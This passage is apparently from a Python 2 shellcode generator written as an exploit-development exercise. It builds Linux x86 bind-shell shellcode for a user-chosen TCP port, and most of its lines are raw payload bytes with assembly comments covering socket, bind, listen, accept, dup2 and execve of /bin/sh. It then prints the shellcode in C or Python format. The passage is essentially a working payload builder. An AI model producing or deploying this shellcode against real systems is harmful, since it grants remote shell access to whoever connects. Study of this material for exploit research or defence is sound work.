# Check if the hex string is even or odd with modulus 2
oddEven = hexStrLen % 2
# if it returns 1 then it's odd. We need to add a leading 0
if oddEven == 1:
hexPort = "0" + hexPort
# converts the port number into the correct hex format
tcpPort = "\\x".join(hexPort[i:i+2] for i in range(0,len(hexPort), 2))
print "Your TCP Port in Hex is:","\\x"+tcpPort
nullCheck = deciPort % 256
if nullCheck == 0 :
print "Your TCP Port contains a Null 0x00."
print "Try again with a different Port Number."
exit(0)
# 1. Create a new Socket
# <socketcall> ipv4Socket = socket( AF_INET, SOCK_STREAM, 0 );
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart1 = "\x31\xc0" # xor eax, eax; This sets the EAX Register to NULL (all zeros).
scPart1 += "\xb0\x66" # mov al, 0x66; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart1 += "\x31\xdb" # xor ebx, ebx; This sets the EBX Register to NULL (all zeros).
scPart1 += "\xb3\x01" # mov bl, 0x1; EBX is set to create a socket
scPart1 += "\x31\xc9" # xor ecx, ecx; This sets the ECX Register to NULL (all zeros).
scPart1 += "\x51" # push ecx; ECX[2]. ECX is NULL
scPart1 += "\x53" # push ebx; ECX[1]. EBX already has the value we need for ECX[1]
scPart1 += "\x6a\x02" # push dword 0x2 ; ECX[0]. Push the value 2 onto the stack, needed for AF_INET.
scPart1 += "\x89\xe1" # mov ecx, esp ; ECX now holds the pointer to the arg array
scPart1 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80 - Executes socket().
scPart1 += "\x96" # xchg esi, eax ; After the SYSCAL, sockfd is stored in the EAX Register, save in ESI
# 2. Create TCP-IP Address and Bind the Address to the Socket
# struct sockaddr_in ipSocketAddr = {
# .sin_family = AF_INET, .sin_port = htons(4444), .sin_addr.s_addr = INADDR_ANY};
# ARG[0] ARG[1] ARG[2]
#<socketcall> bind(ipv4Socket, (struct sockaddr*) &ipSocketAddr, sizeof(ipSocketAddr));
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart1 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart1 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart1 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart1 += "\xb3\x02" # mov bl, 0x2 ; EBX is set to create a socket
scPart1 += "\x31\xd2" # xor edx, edx ; This sets the EDX Register to NULL (all zeros).
scPart1 += "\x52" # push edx ; ARG[2]. EDX is NULL, the value needed for INADDR_ANY.
scPart1 += "\x66\x68" # push word 0x?? ; ; ARG[1]. This is for the TCP Port #
#tcpPort = "\x11\x5c" # TCP Port 4444 = 0x5c11
scPart2 = "\x66\x53" # push bx ; ARG[0]. Push the value 2 onto the stack, needed for AF_INET.
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\x89\xe1" # mov ecx, esp ; Save the memory location of ARG[0] into the EDX Register.
scPart2 += "\x6a\x10" # push 0x10 ; ECX[2]. Our Struct of ARG's is now 16 bytes long (0x10 in Hex).
scPart2 += "\x51" # push ecx ; ECX[1]. The pointer to the beginning of the struct we saved
scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1" # mov ecx, esp ; Now we need to point ECX to the top of the loaded stack.
scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80
# 4. Listen for incoming connections on TCP-IP Socket.
# <socketcall> listen( ipv4Socket, 0 );
# EAX=0x66 EBX ECX[0] ECX[1]
scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart2 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart2 += "\xb3\x04" # mov bl, 0x4 ; EBX is set to listen().
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\x51" # push ecx ; ECX[1]. Push the value 0x0 to the stack.
scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1" # mov ecx, esp ; Point ECX to the top of the stack.
scPart2 += "\xcd\x80" # int 0x80 ; Executes listen(). Allowing us to handle incoming TCP-IP Connections.
# 5. Accept the incoming connection, and create a connected session.
# <socketcall> clientSocket = accept( ipv4Socket, NULL, NULL );
# EAX=0x66 EBX ECX[0] ECX[1] ECX[2]
scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\xb0\x66" # mov al, 0x66 ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
scPart2 += "\x31\xdb" # xor ebx, ebx ; This sets the EBX Register to NULL (all zeros).
scPart2 += "\xb3\x05" # mov bl, 0x5 ; EBX is set to accept().
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\x51" # push ecx ; ECX[2]. Push the value 0x0 to the stack.
scPart2 += "\x51" # push ecx ; ECX[1]. Push the value 0x0 to the stack.
scPart2 += "\x56" # push esi ; ECX[0]. This is the value we saved from creating the Socket earlier.
scPart2 += "\x89\xe1" # mov ecx, esp ; Point ECX to the top of the stack.
scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80
scPart2 += "\x93" # xchg ebx, eax ; The created clientSocket is stored in EAX after receiving a connection.
# 6. Transfer STDIN, STDOUT, STDERR to the connected Socket.
# dup2( clientSocket, 0 ); // STDIN
# dup2( clientSocket, 1 ); // STDOUT
# dup2( clientSocket, 2 ); // STDERR
# EAX EBX ECX
scPart2 += "\x31\xc0" # xor eax, eax ; This sets the EAX Register to NULL (all zeros).
scPart2 += "\x31\xc9" # xor ecx, ecx ; This sets the ECX Register to NULL (all zeros).
scPart2 += "\xb1\x02" # mov cl, 0x2 ; This sets the loop counter, and
# ; will also be the value of "int newfd" for the 3 dup2 SYSCAL's.
#dup2Loop: ; Procedure label for the dup2 Loop.
scPart2 += "\xb0\x3f" # mov al, 0x3f ; EAX is now 0x0000003F = SYSCALL 63 - dup2
scPart2 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80 - Executes accept().
# ; Allowing us to create connected Sockets.
scPart2 += "\x49" # dec ecx ; Decrements ECX by 1
scPart2 += "\x79\xf9" # jns dup2Loop /jns short -5 ; Jump back to the dup2Loop Procedure until ECX equals 0.
# 7. Spawn a "/bin/sh" shell for the client, in the connected session.
# execve("/bin//sh", NULL, NULL);
# EAX EBX ECX EDX
scPart2 += "\x52" # push edx ; Push NULL to terminate the string.
scPart2 += "\x68\x2f\x2f\x73\x68" # push 0x68732f2f ; "hs//" - Needs to be 4 bytes to fit on stack properly
scPart2 += "\x68\x2f\x62\x69\x6e" # push 0x6e69622f ; "nib/" - This is "/bin//sh" backwards.
scPart2 += "\x89\xe3" # mov ebx, esp ; point ebx to stack where /bin//sh +\x00 is located
scPart2 += "\x89\xd1" # mov ecx, edx ; NULL
scPart2 += "\xb0\x0b" # mov al, 0xb ; execve System Call Number - 11
scPart2 += "\xcd\x80" # int 0x80 ; execute execve with system call interrupt
# Initiate the Shellcode variable we will output
shellcode = ""
# Add the first part of the tcp bind shellcode
for x in bytearray(scPart1) :
shellcode += '\\x'
shellcode += '%02x' %x
# Add the user added tcp port to the shellcode
shellcode += "\\x"+tcpPort
# Add the second part of the tcp bind shellcode
for x in bytearray(scPart2) :
shellcode += '\\x'
shellcode += '%02x' %x
print "Choose your shellcode export format."
exportFormat = raw_input("[1] = C Format\n[2] = Python Format\n[1]: ")
if exportFormat == "2" :
formatSC = '"\nshellcode += "'.join(shellcode[i:i+48] for i in range(0,len(shellcode), 48))
print "[-----------------------Your-Shellcode------------------------]"
print 'shellcode = "'+formatSC+'"'
else :
formatSC = '"\n"'.join(shellcode[i:i+48] for i in range(0,len(shellcode), 48))
print "[----------------Your-Shellcode------------------]"
print ' unsigned char shellcode[] = \\\n"'+formatSC+'";'